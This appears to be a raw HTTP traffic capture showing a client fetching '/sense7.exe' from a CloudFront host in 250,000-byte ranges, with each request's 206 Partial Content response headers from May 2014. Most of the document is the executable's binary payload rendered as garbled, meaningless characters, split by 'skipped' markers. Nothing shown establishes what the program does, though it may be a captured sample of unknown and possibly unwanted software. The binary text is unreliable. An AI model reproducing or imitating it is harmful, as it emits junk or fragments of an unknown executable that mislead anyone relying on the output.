    ...m{p~1....=$,.m.VH.k....`3Bu...7.I&..<@.qI..YW.'.vW.0Q.}.h.x..Tz.
    ..?...mn........N*B.....8e.U....`A.Z ...........-..E.9....|.i....,.Z?.
    .......Exswfg.x]..I.,.2...%..m..F.N.;.^.z.I.9.@....=...........X......
    .c1..O.....)P.r.....[...n...Q....%.Ÿ..R.V'Z..6.,.\.....#.../(.;..{0.
    .....S[0......i........0....p,....d.r...y..y.../.....$.G.6 .[.(.....j&
    lt;#..=......9.b.r.;.6.$.....Y.&^.......T./..Nd.<....-...a.H..Kn..,
    O..p.{.$.-o.PJ..t. ...%&B S.(p\.G.z.p'..M[s_[...E..KQ.......5.B.&{!..y
    ....x..q..&....,......EBb$j..Hb.....:...g...d...jzn..i. . ..".nW......
    t..#u8..F].x.$'.x.....=....T:..B.V...G.y3.,..x.{.5.BS$.x..I|....B..$.6
    ...;..s.F..}.DU....O.B5o..!./[email protected]._;/).a.U:...A.S..Qq..<..
    .Y........k..!.Q3......O>br.c.oC,....\.T*..n......4D.v tb....p.W..X
    ...s..j:.{}=.,.l%...o.....&./.y..kj..{.K..=ufS..J...o.'.c.A.w...\{.&-
    ]...."P......7..\t....,TT.3S.E4..n.:5I.<...O.z.U....X..2..Q=~.{..a.
    ..y....z......U..........9.&...qh.Oy...[..<.2.Q....s..}....0..N9.E.
    ]..zc.D............S>..v...N....sC.N,..\.........L.]g.p.=|..4..

    <<< skipped >>>

    GET /sense7.exe HTTP/1.1

    Range: bytes=1250000-1499999
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; SBUA)
    Host: d26ccbexlraban.cloudfront.net
    Connection: Keep-Alive


    HTTP/1.1 206 Partial Content
    Content-Type: application/octet-stream
    Content-Length: 250000
    Connection: keep-alive
    Date: Wed, 21 May 2014 16:45:12 GMT
    Last-Modified: Wed, 21 May 2014 11:17:01 GMT
    ETag: "9f45a4387401a9cf2cbd1707547b4ee1"
    Accept-Ranges: bytes
    Server: AmazonS3
    Content-Range: bytes 1250000-1499999/8693594
    Age: 4830
    X-Cache: Hit from cloudfront
    Via: 1.1 e221f10364b01c985bee5041ce94f592.cloudfront.net (CloudFront)
    X-Amz-Cf-Id: dD-pU0LMjqKvjFrtg52zpEBXxoToK1N-aJL7mL9PGbayiQWftLDNLg==
    .Po..b..U...E.bc}s=..7.i.xX..\h_p...l.N."Y..Rg..*...`............w8<
    ;&.bA.......Z.l.x....#k.N9C....'y'.4.6|O.C.1......].\.zR.-.[.c.Z..C:{.
    ~....8W..W.........Z.......r.>..0P[.........VW]~P...`*,.DTt x...L._
    r..:.~Z.4w`....|....A4.......\...H.t...h.|8...O.....LG/yG..~.. ..2.f..
    ... *`.(..J:......t.......w...?... ..m.A@E~E........i.se..[.s2....lK..
    $......`...q..Uw2.i.!..|5.. $... ~y.....[..........m.e...........a:N..
    %i.J.Y)bN>.<.$.....-.}.[.ne>9.d?J...B. ........z7.c..Q..E.PW.
    ...C.X.._'....E..E.p...I4<)q.......o'..".&9...\[email protected].
    .:D.....L.m(...P...6].t...E..U\.v..b..&.c..TM....$.....#g..-K...o...-.
    ...5....).Z2=w.M..L.j.b..#0erJB.ct...wd0..Z[....F...c.`5.}..:~.:b.H.b.
    {...)Ik....$..u...b..g..(..d..h.....Mu.p......%[email protected]\C....g.Cb..[...G/
    ..z.....8.PI)v.W....)........i...2e..KWz2.c#.@|.....3..k.....>..k..
    ..c...e..V.MbD....k(. ..F3F..":.%........).....0.....X...l....J2..]).|
    pP.....CJv....g..a 8......=U.y.;2...=.....}h.i.(._........b...m-;.. kF
    ......DO...z....7.w...x...6..JE@t}.......0...90..-.Sl=.....?n....\.4.|
    9.Yt.y>a..D.?s."OE....m @<>id....s`.0'w.DZ.....o.;..A.!.i..;.
    .s...g..h.opw.....c..b).....G.)k.H.<.F.i...e..I\b....>....w.t..'
    .P.1.I.O6GI.16..j.............Ie.t.Gb{}....|.^.F..q../...a....O....>
    ;x...E.M.X...7........=.".V.b.'.........K%.v.yybF`....0;xg.....{......
    dT0[6..dC..o...' ......Z. Hk...R*OYCq.)...jH...SR...e.~..F.....O......
    .w.^..#.....QC..Lj.(..[.,}...k.._..y......... ..rR...9.Y..mIm.......b
    ..`.n.s.Zl2*.......:..m..'.?6k.......a...k....^.....f..OU....CS...

    <<< skipped >>>

    GET /sense7.exe HTTP/1.1

    Range: bytes=1500000-1749999
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; SBUA)
    Host: d26ccbexlraban.cloudfront.net
    Connection: Keep-Alive


    HTTP/1.1 206 Partial Content
    Content-Type: application/octet-stream
    Content-Length: 250000
    Connection: keep-alive
    Date: Wed, 21 May 2014 16:45:12 GMT
    Last-Modified: Wed, 21 May 2014 11:17:01 GMT
    ETag: "9f45a4387401a9cf2cbd1707547b4ee1"
    Accept-Ranges: bytes
    Server: AmazonS3
    Content-Range: bytes 1500000-1749999/8693594
    Age: 4831
    X-Cache: Hit from cloudfront
    Via: 1.1 e221f10364b01c985bee5041ce94f592.cloudfront.net (CloudFront)
    X-Amz-Cf-Id: aRaVT9zYvfvizKu4nXzDvX5_CEGTaNTch7UXzYy-Nd3dsBc3dyRpyg==
    ..V...1 ...9.....g.`[email protected]....*...u..w.{). ...^..
    x...U{.w.R.y.r.W..........u.....;E.r.....mp....u../.I...."..r....P...W
    .g.|...t...._...X`..|...<D.owY..:.EG..x....(|~TK.._.3> Q.w.WCB..
    ..(.....)E..k...p1.....z...7I.V...5$.....6.X.....>..]a.cr.I.e.J..gE
    ..4...r........}.J....6. N/)f.~.....<..,.........l."L?.%...!=/..vu.
    K...#.....2L...M.......R4~....:..Q}d....B2.(,.uj%x....*4...G......Ur.j
    u`=..&...K.`1.-(}.i....;.....V&l.4..............)u.:..........#R..u..|
    ...7r`..g.`H...g..D....?........8.C(..e.....Y.c,..n....Np~..vM.r4.)..g
    ..z.P......8$..k..FtAb..:.a.....v{..5.8..'...$..5..$....2.a.=.D.h.<
    .c..~.wh.H...P\.N.1..w*...OU.t..>..>f....[......V*.....]......{7
    ...C..I.5..M.8................i-.1.p_j.....V..Q..}lX^..mf.X...5..^...S
    .....?.....7........q.G.G.W.@^`f....T...u.fm.u.S.Y....5....o._.A......
    Hh..a..?-<.........{..%:..}U>..a.3.pA...i..I..7.^...8... ..6..Zu
    ..{.0...R........X....}....h1........8..o#....~...0....}.Hx...l.$-...s
    nVY..?...i5.[.Q.".3.p...d...L.qu$I<.^$./7.y..4.*...y.Y^....vHv\.8#.
    .].......XBu..u.*...$.7o.pc.....m..".JV|.L[..j.....m-.. ......1.......
    ..h.....ec.Z...(..s.sK.c.V...-....&.U..5r#.NU..9.5X(.v..?.QLDkh....4x{
    )..{.).H.\.....g......oO_!Gpi.$,...<......... ..."..d..8.N.........
    6......k..~..d...y;E7&...,.o...>....g._.\x..73..0k.&f...k.m...<d
    ..__.'......E..j.....r.4.P..../6.b]..-.6.^...Po}F.0h.....^.N..<WvH.
    ...lc...wI....`|..V....2.0...j..T{.N.9.j..<...f.N.T..........%&.lU.
    t. [email protected]..?...q............FF..........Q..[FP.....

    <<< skipped >>>

    GET /sense7.exe HTTP/1.1

    Range: bytes=1750000-1999999
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; SBUA)
    Host: d26ccbexlraban.cloudfront.net
    Connection: Keep-Alive


    HTTP/1.1 206 Partial Content
    Content-Type: application/octet-stream
    Content-Length: 250000
    Connection: keep-alive
    Date: Wed, 21 May 2014 16:45:12 GMT
    Last-Modified: Wed, 21 May 2014 11:17:01 GMT
    ETag: "9f45a4387401a9cf2cbd1707547b4ee1"
    Accept-Ranges: bytes
    Server: AmazonS3
    Content-Range: bytes 1750000-1999999/8693594
    Age: 4833
    X-Cache: Hit from cloudfront
    Via: 1.1 e221f10364b01c985bee5041ce94f592.cloudfront.net (CloudFront)
    X-Amz-Cf-Id: 9x6Vizua_amC_FMPXf7Mgmk6g5K5QSTpvXXCCCv4XgZNW9f-gGnfrQ==
    .r/.RH.....-...r...e..f...Q.V..!H.".......\}.2...(.. ....<y{..L?.Vt
    1.......g...|........4..p...\[email protected]~.`p....U..
    ......[J2}.C.l..^...E...^x....p..;C.2.m......z..n..&h.#.we} .)^&..U.2.
    ...%..L.p9t&)VR6z..].J...y..[.3V.z.1..;.O......A..(....*...I..#Y..A..&
    gt;aV..T.O.[f.........E...~.w.m$H....r.{.%..v...p)U9..N.Jxgzw1...QH...
    I..d.?.k...Z..^.X.!.....1.'..=2......0.s...![....H....o..g.y.Z$..0..8.
    ....HpAYN.....2C`12..P . ..F}.7A$D..t_...........8...._.Z..B..l...l...
    lx......i..9.._..o...q..;,`gv.B....Pc......Z..B..B.....|..4.EzQ.:...HT
    _|....34...$.......X.S....b4.Sa...p..%...#..r.......4..f..K..x.......x
    ...2.c..N.H..e..*.TZ..-yK..........`&.......K.e.....[_$c.[.>.?y....
    .k8...>....*..^..=...Z%.....J.`....!......:..C.-}...Qc"...LxQN.a...
    4]iA...D!T..l.....{..nS..h../...k./.....)m...>...y.3....Y.....<.
    ..h.sn..w}C.....Ww~.hv.$RbE..N...%.J{}.`.[....yz../..m.....em...at..;.
    ..6_...?...76....9o.........tr...K.0. ...X..............-bec...n......
    #.B.....Iz..c.%....}.......&.V.'.5..N...;..3.`(..`.g.......l.L....L..=
    .....U...R|.c.&}..%.(:..R.....C.R=l)Z..6....".(.....DG-/......A...S.t.
    .:.4.8>...e...i0T.....[G..b........)x...H...5.\....N.:>....9. ..
    ...C..V........'...c.%.F.....D.*...SU.Sg .Q...........U.W..y.. .r.....
    h9..n......[.....LN6D.......>B...;....x...1..^.0...q1..w...........
    ,..[.J.n....n..hw.d'..'M.<.E;.....k...=......P..h..jT........].;...
    ..o..9..9...p....H..Am. ....6 ....c(.{..2.3L..-o3..6g0.H......1..G.a..
    ...P$........~........8.L..48..*....M..O...(..Zu..fx~&.....F.....\

    <<< skipped >>>

    GET /sense7.exe HTTP/1.1

    Range: bytes=2250000-2499999
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; SBUA)
    Host: d26ccbexlraban.cloudfront.net
    Connection: Keep-Alive


    HTTP/1.1 206 Partial Content
    Content-Type: application/octet-stream
    Content-Length: 250000
    Connection: keep-alive
    Date: Wed, 21 May 2014 16:45:12 GMT
    Last-Modified: Wed, 21 May 2014 11:17:01 GMT
    ETag: "9f45a4387401a9cf2cbd1707547b4ee1"
    Accept-Ranges: bytes
    Server: AmazonS3
    Content-Range: bytes 2250000-2499999/8693594
    Age: 4835
    X-Cache: Hit from cloudfront
    Via: 1.1 e221f10364b01c985bee5041ce94f592.cloudfront.net (CloudFront)
    X-Amz-Cf-Id: E3MO6nQkcpRCIRdoyfMa1MVhU-TyhM_ieBJiVqxcaakLS_BeqBSufw==
    ..b.`R>.....9P..z..f..|...q.........;.m.,. a..$u.V|..B?...0........
    ..:...e;.A&........[.*.SW.....D..z%.Mq$.S......D.WfI..'.\..nzw.NQA....
    ..c[l.i~.'..>.O....-..l..$..U..&..j-o...&.=.........?..cS.(...Ky*1Q
    >.`.&1=X...A..#j..Si......$e8.Kso(x.rd..GQ[.<5~.2...2..\#7.J.?..
    [email protected]$G*.~%.........>[email protected]....
    .....2.&......c.Q.9..I....]|..W.:el.K.........7$.!....#.q...v...I7....
    .2.n'j<..."...c........m......s.;.yV.......'.<...oS...d.c.]..vS`
    ...a..vG...`'Z....80|Wy.<..=......vX.O...B<../..T..\|..9......Un
    ....q...fD.i...K.n..7E..7.W....A..wZpj....L..Y....cV.I..Z...K...V.(..p
    )...=..oJ.)q..pc..P*.0...=.6.7.?... (}9t-.R...m..-....xT-.x.../...%..t
    .3.e..N.....'}...:-m...D.....&......w....... .8.uF8....Cz..^.O.......
    W...t..Rh..$...8T.........h8...H...r.F....[__.l....k..p.Z.N.....)...G
    .a....?.=<.}N....n=..GG.e..m.Y .........j....m.q..f..4.f....u...2G.
    ......L..g..ni3..H...bB~...u.0.w....R5X..5.....W..L9..F....:..........
    ...J*...B(...,g.*[email protected]_.;..Y......t..h.]..%L.K.-d.g.PP.\...c.m
    V....v.....{j.....E0.r........s.]#......Y.u..&.Z.r...3...}.P....Y.....
    v2[..8.s.....2.q....v....rDvo16T).bH?....... ....w.Q>n...(.tI.....T
    G...i.O.w,.y...DSc{.Nb..}E_py..9.y...#.)3....{..^N.zx8|.g..i...BI. ...
    .....<.^Ly1....r....2V..r..v..B.Cv..[g.B....#...,..sI...~..T...f.GZ
    .w..u..4...&....7....~sd.T.:...~f{.........$..f..cq ......*....I.....8
    .7(......ZE...L...`.~kz%.9....AH....Z.b..G........r<m...I.0..?D.|73
    .../..H/........,.&*&...:.].4.0....9.......K..j..N78..7.ki...!N.U.

    <<< skipped >>>

    GET /sense7.exe HTTP/1.1

    Range: bytes=2500000-2749999
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; SBUA)
    Host: d26ccbexlraban.cloudfront.net
    Connection: Keep-Alive


    HTTP/1.1 206 Partial Content
    Content-Type: application/octet-stream
    Content-Length: 250000
    Connection: keep-alive
    Date: Wed, 21 May 2014 16:45:12 GMT
    Last-Modified: Wed, 21 May 2014 11:17:01 GMT
    ETag: "9f45a4387401a9cf2cbd1707547b4ee1"
    Accept-Ranges: bytes
    Server: AmazonS3
    Content-Range: bytes 2500000-2749999/8693594
    Age: 4837
    X-Cache: Hit from cloudfront
    Via: 1.1 e221f10364b01c985bee5041ce94f592.cloudfront.net (CloudFront)
    X-Amz-Cf-Id: TM9gL8VwMuq1yx-VGQer9LNi3I5D3mOVXjY7QxxllCEmkfyiTOQ8tw==
    .a.]....h~h..Y. .../.....i....V......g..6.......(...r!.[.z& ...u...0..
    i.oya..Z...l_j....(.g#M8.... Y ...x.,_..-....j<..4}?.c.&Kb...P1.X[.
    .9W.l.LR..........$N...%......._4~|.D!...G..S.z.wnA&.].|....Jw.C.9..y.
    $... G....>.kk.......~.'..).U%..h..lo.!...N.U.......3.ch.h.E|3.5<
    ;.=.v.. ..........1z...y... .Z.....g@oW..\.......GpaV....;..X....oC3..
    ....4..)...j.....3..o...sl.1\k.Q.%... .)t.....c...P...=.D....Z.%;.?...
    D.)@M...y7..nN.p......AH.;9...A.....Lm.PC...j.._.>..U\..za..*.i..T.
    ....z.Ch....;.h..,a..m7.............U).4k#......g....F......8]...t....
    ...........[....I.Z.....\.GT...../.94e.|..U.t..^.........W........Y...
    .{r...Y4...........j..).Yx..O..OP.?O3!..:_.T...N.....h.Q-.....G.^...y{
    ..x<..Y.......>.... ..].BL.`..tZ........P.H..Y.ad.....P.(.d...9X
    S-B...\3..a.......E.S.......~.V3.........$.]W[..........$...i.g.G@.'hH
    {...^(P....?....e....."0.MG..e...yku.....y...c..-.r.p(D.M....2.:.f...j
    ......q3`A.[[email protected]#$.......y..].......wQ.
    .._B'H&...._}...ulg)q1|.5... ...ru...W5N...........8?.........R.....YZ
    ....n....I._.v5....w...r..O...'dh.....s.=.g...q. ~..Y2\..:.....-.A...N
    ....(....s..^[email protected](.V.y...>W..hp...L..5.{....I.,`L#...bo.s!U.
    ...Z..E.Y<..@.."......@ ....|6!N.a...e.q...7\."T.|.........9...u.n.
    .........5CaIo..(......D|.... .......i8......f...."...A...v.b.s. >&
    ..v.X..{..At.`?.b.........c ..~.q6........%.N..)K....;....db (.....}F.
    E.......'..8.....d........l........v;.p...-...%w)]W0..*.URX......I...d
    Tq...w|.T.....p#.Z..x...c...".6'.Lv7.0...?uc...`....i.z..'j~,..G..

    <<< skipped >>>

    GET /sense7.exe HTTP/1.1

    Range: bytes=3250000-3499999
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; SBUA)
    Host: d26ccbexlraban.cloudfront.net
    Connection: Keep-Alive


    HTTP/1.1 206 Partial Content
    Content-Type: application/octet-stream
    Content-Length: 250000
    Connection: keep-alive
    Date: Wed, 21 May 2014 16:45:12 GMT
    Last-Modified: Wed, 21 May 2014 11:17:01 GMT
    ETag: "9f45a4387401a9cf2cbd1707547b4ee1"
    Accept-Ranges: bytes
    Server: AmazonS3
    Content-Range: bytes 3250000-3499999/8693594
    Age: 4842
    X-Cache: Hit from cloudfront
    Via: 1.1 e221f10364b01c985bee5041ce94f592.cloudfront.net (CloudFront)
    X-Amz-Cf-Id: lMpzxK07Oh-SMR3L-6Zlec-VFMws_9jDg-Cq978dUa9dLECtpg2Qbw==
    ~..L.~in.{.....q2..9.3.G1&.,.)."..%....'jS..]..4sB.....L...).ey...KS.2
    ......(9.....NM../.....!%=.:.6...:q0g...g.........[[email protected]...
    .S].M._-~.\.....z..j.f.eB..#....z..O.;sM.!.F"u........xb.R.9...?Xrd...
    .....-....w.V...k.......g:.....r..0.s......0D..I....i......C....7.....
    X..iX.F..#J...U.W.f...MB.T......*....P..B-).n....p4.rp.SwG.....c'..C.&
    p5...B<...].3.....6...n.....H..d..aS.> .}..J/.K ....Pg.'&....r..
    ..&.3S.u.....B.wc..J..T...SnG.7q...{......I......p...s..h.y..V.r....N.
    .N.<..$.j...Y..VJj.:.S;..,........1...p.....pJ.........O..(...../.4
    .U.=....:.9I.z..On.GTG...|....`m1...6R..^P........,.....d#....9..O.bx}
    ..Q.TU)zcq-{..S...e.4Q....*,[email protected]. t..4{.e.r.dTtj....d
    T'....5....l.A..........`.,!.........W.7....{u.....$......8#5.....?.Me
    ..1|.".C;A1....4...u..../.".w-..w..u1a..Z....U../.LvS.V..h..g|(<$7.
    I.9..Q..v...K...a.Rwy_.....S=R&u&......x.b.e..R..:/,.6...P}.H~.n. .Zz.
    }.. .S.....=..U.u`.RP.`/.R6U..!a...I^.q=m.oWln.:...7...X..Ce.......L..
    .....K....`"..m(..."[email protected]>.......% ........"....H....&.bf.
    .'......q.....MaX.e.x.s7.3.9i.\[email protected]..>.I.n&/.6..Zwo.q..
    .Q.=...2.,3..........W.B. ...Nh.xf5.q.....XyM.d..&y...W-.yg...H|.l....
    ....0.u$.A.....d.hjP....&1p....aT[.D..azlZUm.YI,.XS.....Kkf..Wy..=!?3.
    ..\2.W.TA.L.L!........:.f..r.....P/.sk.'.#.6......*.\..8).J.2..!.%.$..
    z.;.c..X6.WEw..T....6.].O.[..`........J;........d.:o<.U...".4R.rW."
    M..0q.....h..Z.a..m%.H.:D.lS.c......b.~,'....<...m...vW..{dNl.0=...
    (...fk.X....$,.A...R'f.....l..[.|"......s.u...k<.........Y.p..2

    <<< skipped >>>

    GET /sense7.exe HTTP/1.1

    Range: bytes=3750000-3999999
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; SBUA)
    Host: d26ccbexlraban.cloudfront.net
    Connection: Keep-Alive


    HTTP/1.1 206 Partial Content
    Content-Type: application/octet-stream
    Content-Length: 250000
    Connection: keep-alive
    Date: Wed, 21 May 2014 16:45:12 GMT
    Last-Modified: Wed, 21 May 2014 11:17:01 GMT
    ETag: "9f45a4387401a9cf2cbd1707547b4ee1"
    Accept-Ranges: bytes
    Server: AmazonS3
    Content-Range: bytes 3750000-3999999/8693594
    Age: 4845
    X-Cache: Hit from cloudfront
    Via: 1.1 e221f10364b01c985bee5041ce94f592.cloudfront.net (CloudFront)
    X-Amz-Cf-Id: rWXUGDWX__DtG8fc31PuCrwQ9t8jwFxzir_2t8cPsDQdX3Vd3KoSoQ==
    C*.Y.....7........Yp...q.#..A...5a.kRG\{M.....$...7......d(k$....d..8.
    .%......]...W.]...q..a...s...@[..L..J.s..)L.....oY.w."&..`.O/..D|...:.
    ....E<S...r..2z=.%..Cd..o.1.......M}..Cl..I.m.<.D0wG.ai.[.M..3Bk
    ..............H....>....}6..X.[...-.../.2......9V.wY.v.3.....N..ET$
    ..q[.I..(....TU_.....u .I.2...0..\k].J0f.R../g....O3K....C..D..B.r....
    ..f..H1..L.#..T../.."7k.....y........'.._.g..d\...K/.g..."..1.o..B.n..
    v.`.&...kN.?.iNX...Q..X.....q.*.b.....{).G.....3Y....4...@..!9.3..-.
    w.XU.....Ja.Q.v. . ..o..EH...G.BI..j.Ds$6'..6u...t9;1..n%..Tv2.`9....~
    )m....-M......1.)[email protected]&.f4.........Y.Tb..............*@.....F"V.
    ._I.)F.Z............Bm0T...../Ot. .m,7.US..'...N&@_.3]..n..v.`U.3s.4M.
    A...6.s.....N..=..wj..GI.=s....2g!h...U...|.\52..M..T.D.G.Y..d.RMT8..[
    9....uz.J...t.D.#.R.~N.&.[..K.qQZ.*...[..U-....>.".X.*Q..t....g(S..
    ...../| P..B}=.../?...A.|s!...3W.4.....'..7h....L..8Y...........x....i
    K...8 h....W.;vY...!.uT..U.$.Jt@#.z..5e............u.i....>..V..m..
    .1.B...z..¯.o.x."....M._..XX.....>C...<....ON..,....f..R.....:
    ...?.L.9....&.....j....V...-...p...s.4Sf.\..... hz..P............/pt..
    .{.......~.:_.Y..Lh...._.r.;.{.{... .........2- ..X........^:HD&.f....
    .mZ."6.i....E........T........6.9KS....x\t...............z..XW<.].{
    .P....`..[.r'../xVF...o& S;yw..[.h....Zu...vl.6......w...fK.s.CT])....
    .......t....b....wE..[.UX$.d6..d. .S.....v."A.z.i7.*.D7[.~m..D%...i..^
    ..9....s.2.Q..m..Q..:qb.....1..v.....U.=.7;[email protected][.E._*...j06.4..
    c...=D..v...N.u.|..0..JFip.m.y..'......j.=m...........D......x.@..

    <<< skipped >>>

    GET /sense7.exe HTTP/1.1

    Range: bytes=4250000-4499999
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; SBUA)
    Host: d26ccbexlraban.cloudfront.net
    Connection: Keep-Alive


    HTTP/1.1 206 Partial Content
    Content-Type: application/octet-stream
    Content-Length: 250000
    Connection: keep-alive
    Date: Wed, 21 May 2014 16:45:12 GMT
    Last-Modified: Wed, 21 May 2014 11:17:01 GMT
    ETag: "9f45a4387401a9cf2cbd1707547b4ee1"
    Accept-Ranges: bytes
    Server: AmazonS3
    Content-Range: bytes 4250000-4499999/8693594
    Age: 4846
    X-Cache: Hit from cloudfront
    Via: 1.1 e221f10364b01c985bee5041ce94f592.cloudfront.net (CloudFront)
    X-Amz-Cf-Id: IjxfvmxmnfTSrt8A4K_rNRNr9fSiv0nTlGyX9wldW0JY9xb6luCTXg==
    ..e....R..*B....)`..._.Oo..T......`k...rQ...3..|...../....%.Z..3......
    .w......68...h..%....K.e{.|F.....G^..f.M....J%.....oQ4....).V.brB.>
    ..-...~0{..M.k.BgrgM^...~.HC......f..!CQ........>I.\....L.........u
    Y.......F..7g*..#..%.....T...4.z.7,;.....1...2..GN......w....1.N...&..
    .L.T.$%..E.2I&..q.......:...<..^...(...../(...a...5`AZ..7Q7.?a.r.R.
    K.8...zj ....;..rz.......!#C.iX{....q...*.u{..7z<..x..V{..>.w...
    ..t...,...X...5D..~.D./@...)6...d..z.@.<.]..B=pa.q...U..ILk.'w5.r.
    Y.z.L<s$..y...%.....-M...X|...70...].~......P.......>u..f./Zj.%&
    lt;.@Ns....=......Yoa....'.S.w...v=d..G..3.9.6..dnZ...t.....%g..l..R..
    .....1..;...v.........>j.I..p.(.OI...s.S)..K../...8&Sd.V.Y.:....6Re
    w.Vg.~...........y......._..O.y.C..0....v.k..bZ.Y..9....Y.>........
    Rp...AR.lX.:..B?I........K;.....Qk_......N4...L|......}.1...<.f.[.D
    <X=.%.....5.0...a9*...(.........I.......P.?0^.nZ.e.7..W.?a..:.e.*..
    ....a..E.ol^.d........vu{Fko.Ry.i'{(.y.7 k.. p.R.........,...&W.`.....
    .....-...4..q...j..D..O..0J"]Y..=....A......8...X].K......F.....W.4.d.
    ...K`6...8..#.....oh#V.t....O.......L.......sLO...N.. \s...w".....y...
    AC*?i....[...3......?..<...{.".=..i...$S...Vd.... .}....M^..Y. 8-..
    .W.I.... W...K"M}..c...........i..C.!..!V.J".K..V...s.L..............9
    |..Qy..S..&k..\.p8..k..>.....*.h?....N.....`6....%^.w......q.'l..F.
    ."..I}.Y...U..X ..7..u.K..U..2..$L.f..0o\.....;...".E....^.&-.F.w..j..
    }._.........G.H.....u...j....Q...].Z9di.t.i...:..B..P..B,.v....:..X..t
    ..q~...6h..;Q.....p.y..]..!. !........9.y\A...*:N.w'......u...6z..

    <<< skipped >>>

    GET /sense7.exe HTTP/1.1

    Range: bytes=4750000-4999999
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; SBUA)
    Host: d26ccbexlraban.cloudfront.net
    Connection: Keep-Alive


    HTTP/1.1 206 Partial Content
    Content-Type: application/octet-stream
    Content-Length: 250000
    Connection: keep-alive
    Date: Wed, 21 May 2014 16:45:12 GMT
    Last-Modified: Wed, 21 May 2014 11:17:01 GMT
    ETag: "9f45a4387401a9cf2cbd1707547b4ee1"
    Accept-Ranges: bytes
    Server: AmazonS3
    Content-Range: bytes 4750000-4999999/8693594
    Age: 4850
    X-Cache: Hit from cloudfront
    Via: 1.1 e221f10364b01c985bee5041ce94f592.cloudfront.net (CloudFront)
    X-Amz-Cf-Id: 4GuYa77ICLb3rNRNaFEn0ABz_b_Od2LAtaEEpj2ggeMj_rCzOk5OJg==
    ..F/<.x...-...O.\bi,.I......O.e.....[;j...,sc..........-d...:...1\J
    z.O....h.N..,...)'...X..H.bH..D..7...#<#.mYE[.. ..M. .O)....)...B..
    O?P ...'....s.............kF....\..3k`s.x.. .d...4..8.9_..:z.....f....
    ...h*.w......]..'..Il.....a...~Ho-.s.................}By.>pV..N.ph.
    ...M0:6`[M..*.......Q.2....An.k.u...1.!..Svq........a*%!..|q...="-.`..
    ....{s.b.ThO5/..O_-U.%....R0....NGMV...O..`....oZ...Ug.6e.............
    :.....>...C_....21E._e2 L.6..<V...^....0p`o5.q`.6hQkoh.ys\..x..m
    ...N.....59.OR_..|.....l{..X].a.....t.k..w=.3.......3.....x...l.......
    J..5...,...:....z{.0.....B.z.%.-..._....C..Y......7g.R.;4r.m...K.}H...
    _...a.bE.3...x......K.....Eb.I.........J.....Ok..N.|.m/9hSK.7-]...d.AV
    ..5....y..Q.....v,..}....}..5Jv.D.H...U...*IsI.m*.Y.`.94.[!..jU.y.<
    X. .s/.I.......B....H[\.#||k.Z.})U..T.`.k..;.2...E.^x<.>.....^..
    ....`..\.n.`.....s-.snG&..J..h....S..d)1T.gA.....:.5....R8w.ZA.H...Ge.
    ..f..0. .,. ..e}...,{Uut.=..W....[.%..{..."...;....W.Rq....NS...7.%..U
    ...-RX"'.H.U.w.&.3.......(.M/..%....Cv...Dj..g. .............X........
    .!.......`6..#j-J...8.y#'.S._..7......r.76....y.i...(.?.........K....n
    ........c.V..g.ef........r.6..W....F.^.....5.Ou.v.....{.m.......d \rS.
    .Z..H..,....99C...f......Y.>J....V{.!...e..^.F..........Z....sa....
    .L.V.Y...d..D..J.?/_Y...M. ..Ld..`....'iH.......;!j...,.....L..Z...B.
    |.Q@.}p...42D...rE.......z......8...u.e..d..0....T.P..On....zf.c3S.VJ#
    ...G..D..5.,...].se....Inm.'\...... 6.Q. .........k.r...Mr....E.....bX
    ...JA..j........0...L<...e....2X.....a....t.u..p....MfF:.. ...P

    <<< skipped >>>

    GET /sense7.exe HTTP/1.1

    Range: bytes=5250000-5499999
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; SBUA)
    Host: d26ccbexlraban.cloudfront.net
    Connection: Keep-Alive


    HTTP/1.1 206 Partial Content
    Content-Type: application/octet-stream
    Content-Length: 250000
    Connection: keep-alive
    Date: Wed, 21 May 2014 16:45:12 GMT
    Last-Modified: Wed, 21 May 2014 11:17:01 GMT
    ETag: "9f45a4387401a9cf2cbd1707547b4ee1"
    Accept-Ranges: bytes
    Server: AmazonS3
    Content-Range: bytes 5250000-5499999/8693594
    Age: 4852
    X-Cache: Hit from cloudfront
    Via: 1.1 e221f10364b01c985bee5041ce94f592.cloudfront.net (CloudFront)
    X-Amz-Cf-Id: mb0suR5s_iVhYNxugZdrppbKP_xH4e-KXOu-TrjBj9fZCWjWZfYNVA==
    .'....*......s..!...'h.f.TB0.wP ..~.y.a.>.3....F...:..-....`g.qL...
    .j....e.d.\.{.}.....\M9......^...3.N.A1M.F..AX~S..j....e.Y....<..?y
    ..........h..{q...{go...8C.5...p...v3....z..CC-J.:...jQ.l...KG.7....1.
    ......|Qtm@O [email protected]......#...N...x.../..L..L(.$.I.m.P&
    .l.... .... .Y.%./.s.H.i%x8"X.D~Z.........lX.IT..N._....f.....d..R.Vl2
    [email protected].{...*IM.72a.........v....3.....^.r....x.@c.
    5.s...".r.e..E.....Hw.C.......l.C.H......?]....E.J......L.....".T.g...
    X....W/.P%..kj.......Rz..aL.g.$'..!..v..k.?n....w/UZ............^.H{\U
    .j...\.....y~.4.Cu.>.`.U.w..h.{%..p.Hyi..0.4......Lr.b?.~.,.'..].4.
    k<_.!p.mQQH."[email protected]... *
    5.*..rl............y....9n.8..<.90.....~|.(Y.........#..U.3........
    ...{...4.4.I....6..{5...P.y.....1L4V].....i..]8..Hw.<.%h...6#l.....
    ....^.M.U......<..H^D..*A.D.7...^D....I........73..,.p\..A.m..a#..i
    ~JW:.3H..L......1.....`."(d.T7..r....6.........V..0..D5..e......93....
    ..K.M.....Wn....`..d..".z.Z.z.\~.......\-.~^.m...!/...m..... K...#S"..
    [email protected].{.i[.]........
    .m.<...u..6..h9".$;4.."b\...{H.~b.*;.\q.#...U...n.UUm..M.e...x.^...
    ...3. (.....{.O. %..*..'.c..Lg.....}..m].<.........w..~8Nj.........
    .m;@.i?.,[email protected].._....[.w.....S.,....:/...v....
    .......H..].....f....^..sn..e............k.m..m.`..wj..J.[.5.n.[.2n.6.
